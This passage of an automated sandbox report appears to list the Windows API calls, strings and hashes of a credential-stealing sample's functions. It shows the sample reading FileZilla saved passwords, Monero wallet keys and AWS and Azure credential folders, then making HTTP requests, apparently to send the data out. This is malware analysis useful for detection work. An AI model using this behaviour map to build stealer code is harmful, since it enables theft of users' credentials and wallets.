                                        • Part of subcall function 0011A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0011A13C
                                        • Part of subcall function 0011A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0011A161
                                        • Part of subcall function 0011A110: LocalAlloc.KERNEL32(00000040,?), ref: 0011A181
                                        • Part of subcall function 0011A110: ReadFile.KERNEL32(000000FF,?,00000000,0011148F,00000000), ref: 0011A1AA
                                        • Part of subcall function 0011A110: LocalFree.KERNEL32(0011148F), ref: 0011A1E0
                                        • Part of subcall function 0011A110: CloseHandle.KERNEL32(000000FF), ref: 0011A1EA
                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00130DBF,00130DBE,00130DBB,00130DBA), ref: 001204C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001204C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 001204E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 001204F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0012052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 0012053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00120579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 00120587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001205C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 001205D5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 00120662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 0012067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 00120692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 001206AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001206C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 001206D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 001206E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 001206F3
                                      • lstrcat.KERNEL32(?,00131770), ref: 00120702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00120715
                                      • lstrcat.KERNEL32(?,00131774), ref: 00120724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00120733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00120746
                                      • lstrcat.KERNEL32(?,00131780), ref: 00120755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00120764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00120777
                                      • lstrcat.KERNEL32(?,00131790), ref: 00120786
                                      • lstrcat.KERNEL32(?,00131794), ref: 00120795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00130DB7), ref: 001207EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: 1ce2b2716344e92bf398105669ad08f1a8a23e3f5f48f649d138e9cb7e932aa6
                                      • Instruction ID: a2b134e9c8f512d8efcde61c4fbd09eb09a4fffb8d2b3b404249dcb9f609ccaf
                                      • Opcode Fuzzy Hash: 1ce2b2716344e92bf398105669ad08f1a8a23e3f5f48f649d138e9cb7e932aa6
                                      • Instruction Fuzzy Hash: 2AD11F71D10218ABDB15EBE0ED96EEE777DAF28300F808558F502B7095EF34AA54CB61
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00114800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                        • Part of subcall function 00114800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00115A48
                                      • StrCmpCA.SHLWAPI(?,00E3F970), ref: 00115A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00115BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E3F9D0,00000000,?,00E3ED58,00000000,?,00131B4C), ref: 00115EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00115ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00115EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00115EEA
                                      • lstrlen.KERNEL32(00000000), ref: 00115EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00115F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00115F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00115F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00115F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00115F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00116000
                                      • InternetCloseHandle.WININET(00000000), ref: 0011600D
                                      • HttpOpenRequestA.WININET(00000000,00E3F920,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 00115C48
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00116017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------$X
                                      • API String ID: 874700897-4062443838
                                      • Opcode ID: f573ad575d09906958e1edc1b1978650b4a12867ae156a901619ddcd8fd20c77
                                      • Instruction ID: 075f60a9d585cf0c8a1c2ad4615b85f144014dc17ebb44e32bb7e9dc31e3fa1e
                                      • Opcode Fuzzy Hash: f573ad575d09906958e1edc1b1978650b4a12867ae156a901619ddcd8fd20c77
                                      • Instruction Fuzzy Hash: DA12F071920128ABCB15EBA0ECA6FEEB37DBF24700F804599F10676091EF706A58CF55
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00128CF0: GetSystemTime.KERNEL32(00130E1B,00E3E7B8,001305B6,?,?,001113F9,?,0000001A,00130E1B,00000000,?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 00128D16
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0011D083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0011D1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0011D1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D308
                                      • lstrcat.KERNEL32(?,00131570), ref: 0011D317
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D32A
                                      • lstrcat.KERNEL32(?,00131574), ref: 0011D339
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D34C
                                      • lstrcat.KERNEL32(?,00131578), ref: 0011D35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D36E
                                      • lstrcat.KERNEL32(?,0013157C), ref: 0011D37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D390
                                      • lstrcat.KERNEL32(?,00131580), ref: 0011D39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D3B2
                                      • lstrcat.KERNEL32(?,00131584), ref: 0011D3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 0011D3D4
                                      • lstrcat.KERNEL32(?,00131588), ref: 0011D3E3
                                        • Part of subcall function 0012AB30: lstrlen.KERNEL32(00114F55,?,?,00114F55,00130DDF), ref: 0012AB3B
                                        • Part of subcall function 0012AB30: lstrcpy.KERNEL32(00130DDF,00000000), ref: 0012AB95
                                      • lstrlen.KERNEL32(?), ref: 0011D42A
                                      • lstrlen.KERNEL32(?), ref: 0011D439
                                        • Part of subcall function 0012AD80: StrCmpCA.SHLWAPI(00000000,00131568,0011D2A2,00131568,00000000), ref: 0012AD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 0011D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 6b40eeddba9c13b408ff67706e48a08564c4cc897dd0eed2de8a9816e28af188
                                      • Instruction ID: b655e5479f22142854326cf6189728a195bba82d7e27eadfeb4a556c6f0bdd6e
                                      • Opcode Fuzzy Hash: 6b40eeddba9c13b408ff67706e48a08564c4cc897dd0eed2de8a9816e28af188
                                      • Instruction Fuzzy Hash: 9FE13171910118ABCB15EBA0ED96EEE733DAF64301F904658F606770A1DF31BE58CB62
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E3DE20,00000000,?,00131544,00000000,?,?), ref: 0011CB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0011CB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0011CB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0011CBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0011CBD9
                                      • StrStrA.SHLWAPI(?,00E3DE98,00130B56), ref: 0011CBF7
                                      • StrStrA.SHLWAPI(00000000,00E3DDA8), ref: 0011CC1E
                                      • StrStrA.SHLWAPI(?,00E3E700,00000000,?,00131550,00000000,?,00000000,00000000,?,00E39260,00000000,?,0013154C,00000000,?), ref: 0011CDA2
                                      • StrStrA.SHLWAPI(00000000,00E3E3C0), ref: 0011CDB9
                                        • Part of subcall function 0011C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0011C971
                                        • Part of subcall function 0011C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0011C97C
                                      • StrStrA.SHLWAPI(?,00E3E3C0,00000000,?,00131554,00000000,?,00000000,00E39230), ref: 0011CE5A
                                      • StrStrA.SHLWAPI(00000000,00E39470), ref: 0011CE71
                                        • Part of subcall function 0011C920: lstrcat.KERNEL32(?,00130B47), ref: 0011CA43
                                        • Part of subcall function 0011C920: lstrcat.KERNEL32(?,00130B4B), ref: 0011CA57
                                        • Part of subcall function 0011C920: lstrcat.KERNEL32(?,00130B4E), ref: 0011CA78
                                      • lstrlen.KERNEL32(00000000), ref: 0011CF44
                                      • CloseHandle.KERNEL32(00000000), ref: 0011CF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 1853dfed1c909856f5608782d21122d6a4d7c3fc00d108af70d4bc2a7d876bb9
                                      • Instruction ID: a1131fff776ff8c969151d4284810fd4a2e883f419f702d543d4d6834fe15113
                                      • Opcode Fuzzy Hash: 1853dfed1c909856f5608782d21122d6a4d7c3fc00d108af70d4bc2a7d876bb9
                                      • Instruction Fuzzy Hash: E2E10C71900118ABCB15EBA4ECA2FEEB779BF64300F4045A9F506B7191EF307A59CB61
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,00E39030,00000000,00020019,00000000,001305BE), ref: 00128534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001285B6
                                      • wsprintfA.USER32 ref: 001285E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0012860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0012861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00128629
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 4f17059db99508a43c7cda4b278710d844cec4af9c133b0ed44fc20ae2e1be13
                                      • Instruction ID: 35a50cf11d3c0e52a81f3483067cbf93b5d70a988b3198c40361b0b33722b17c
                                      • Opcode Fuzzy Hash: 4f17059db99508a43c7cda4b278710d844cec4af9c133b0ed44fc20ae2e1be13
                                      • Instruction Fuzzy Hash: 08812A71911228ABDB28DB54DD95FEAB7BCBF18300F5086D8F109A6180DF706B94CFA0
                                      APIs
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00125000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 0012501D
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124B7C
                                        • Part of subcall function 00124B60: FindFirstFileA.KERNEL32(?,?), ref: 00124B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 0012508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 001250A9
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC4), ref: 00124BC1
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,00130FC8), ref: 00124BD7
                                        • Part of subcall function 00124B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00124DCD
                                        • Part of subcall function 00124B60: FindClose.KERNEL32(000000FF), ref: 00124DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00125118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00125135
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C00
                                        • Part of subcall function 00124B60: StrCmpCA.SHLWAPI(?,001308D3), ref: 00124C15
                                        • Part of subcall function 00124B60: wsprintfA.USER32 ref: 00124C32
                                        • Part of subcall function 00124B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00124C6E
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00E3F910), ref: 00124C9A
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00130FE0), ref: 00124CAC
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,?), ref: 00124CC0
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,00130FE4), ref: 00124CD2
                                        • Part of subcall function 00124B60: lstrcat.KERNEL32(?,?), ref: 00124CE6
                                        • Part of subcall function 00124B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00124CFC
                                        • Part of subcall function 00124B60: DeleteFileA.KERNEL32(?), ref: 00124D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: 12100af891a078a78ac2447e41a5bf7f720408414bc8c60c2328f0cc35dbeecf
                                      • Instruction ID: 1517717e425a7eb1de87efa1461230ea525bef9a768f62540d9ba164bb00f078
                                      • Opcode Fuzzy Hash: 12100af891a078a78ac2447e41a5bf7f720408414bc8c60c2328f0cc35dbeecf
                                      • Instruction Fuzzy Hash: 3F41A0BAA4021867DB64E770EC97FDD733C9B64700F404994B649A60C1EFB4A7D88B92
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001291FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
